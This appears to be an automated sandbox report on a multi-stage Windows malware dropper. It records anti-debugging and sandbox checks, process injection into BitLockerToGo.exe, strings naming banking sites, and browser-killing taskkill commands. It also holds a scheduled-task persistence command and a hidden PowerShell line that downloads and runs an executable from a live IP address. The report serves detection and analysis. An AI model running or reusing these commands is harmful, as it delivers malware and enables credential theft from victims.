Source: dd662b5386.exe, 0000000E.00000002.2617426334.000000000157E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__za
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 5a20b6327b.exe, 0000000B.00000002.2456692421.000000000068D000.00000040.00000001.01000000.0000000F.sdmp, 1e8e57d62a.exe, 0000000C.00000002.2647330901.0000000000FDC000.00000040.00000001.01000000.00000010.sdmp, dd662b5386.exe, 0000000E.00000002.2616133002.0000000000D7A000.00000040.00000001.01000000.00000011.sdmp, dbe8776a6a.exe, 0000000F.00000002.2719206888.0000000000B68000.00000040.00000001.01000000.00000012.sdmp, 186adf2617.exe, 00000011.00000000.2633796457.0000000000ADF000.00000080.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000011.00000002.2935299685.0000000000ADF000.00000040.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000011.00000003.2652107833.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, 43a79b4335.exe, 00000013.00000002.2767954304.0000000001274000.00000040.00000001.01000000.00000014.sdmp, 186adf2617.exe, 00000014.00000002.2969690821.0000000000ADF000.00000040.00000001.01000000.00000013.sdmp, 186adf2617.exe, 00000014.00000003.2779109464.00000000056D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 186adf2617.exe, 00000014.00000003.2814742379.0000000005E42000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Code function: 6_2_00444660 LdrInitializeThunk,

6_2_00444660

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009DA1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_009DA1A5

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DDB60 mov eax, dword ptr fs:[00000030h]	0_2_009DDB60
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009E5FF2 mov eax, dword ptr fs:[00000030h]	0_2_009E5FF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5DB60 mov eax, dword ptr fs:[00000030h]	1_2_00B5DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B65FF2 mov eax, dword ptr fs:[00000030h]	1_2_00B65FF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5DB60 mov eax, dword ptr fs:[00000030h]	2_2_00B5DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B65FF2 mov eax, dword ptr fs:[00000030h]	2_2_00B65FF2
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4_2_025221C1 mov edi, dword ptr fs:[00000030h]	4_2_025221C1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4_2_0252233E mov edi, dword ptr fs:[00000030h]	4_2_0252233E

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 2_2_00B704F2 GetProcessHeap,

2_2_00B704F2

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DA1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009DA1A5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DA308 SetUnhandledExceptionFilter,	0_2_009DA308
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009D98B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009D98B8
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009DEB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009DEB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00B5A1A5
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5A308 SetUnhandledExceptionFilter,	1_2_00B5A308
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B598B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00B598B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B5EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00B5EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00B5A1A5
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5A308 SetUnhandledExceptionFilter,	2_2_00B5A308
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B5EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00B5EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B598B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00B598B8

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_4568.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: 43a79b4335.exe PID: 3656, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009B8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_009B8070

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Memory written: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 27C008
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 33A008
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000

Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe "C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe "C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe "C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe "C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe "C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: 40c4d92e87.exe, 00000015.00000000.2769778747.0000000000932000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 186adf2617.exe, 00000011.00000002.2939938359.0000000000B23000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: GProgram Manager
Source: dbe8776a6a.exe, 0000000F.00000002.2719206888.0000000000B68000.00000040.00000001.01000000.00000012.sdmp, 43a79b4335.exe, 00000013.00000002.2767954304.0000000001274000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: Program Manager
Source: dd662b5386.exe, 0000000E.00000002.2616133002.0000000000D7A000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: dTProgram Manager
Source: 5a20b6327b.exe, 0000000B.00000002.2457073971.00000000006D6000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: pxProgram Manager
Source: 1e8e57d62a.exe, 0000000C.00000002.2647330901.0000000000FDC000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: :Program Manager

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009DA38F cpuid

0_2_009DA38F

Source: C:\Users\user\Desktop\random.exe	Code function: EnumSystemLocalesW,	0_2_009F20C8
Source: C:\Users\user\Desktop\random.exe	Code function: EnumSystemLocalesW,	0_2_009E81BC
Source: C:\Users\user\Desktop\random.exe	Code function: EnumSystemLocalesW,	0_2_009F21AE
Source: C:\Users\user\Desktop\random.exe	Code function: EnumSystemLocalesW,	0_2_009F2113
Source: C:\Users\user\Desktop\random.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_009F2239
Source: C:\Users\user\Desktop\random.exe	Code function: GetLocaleInfoW,	0_2_009F248C
Source: C:\Users\user\Desktop\random.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_009F25B2
Source: C:\Users\user\Desktop\random.exe	Code function: GetLocaleInfoW,	0_2_009F26B8
Source: C:\Users\user\Desktop\random.exe	Code function: GetLocaleInfoW,	0_2_009E86DE
Source: C:\Users\user\Desktop\random.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_009F2787
Source: C:\Users\user\Desktop\random.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_009F1E26
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	1_2_00B720C8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	1_2_00B681BC
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	1_2_00B721AE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	1_2_00B72113
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00B72239
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	1_2_00B7248C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00B725B2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	1_2_00B726B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	1_2_00B686DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00B72787
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00B71E26
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	2_2_00B720C8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	2_2_00B72021
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	2_2_00B681BC
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	2_2_00B721AE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	2_2_00B72113
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00B72239
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	2_2_00B7248C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00B725B2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	2_2_00B726B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	2_2_00B686DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00B72787
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00B71E26

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe VolumeInformation	Jump to behavior
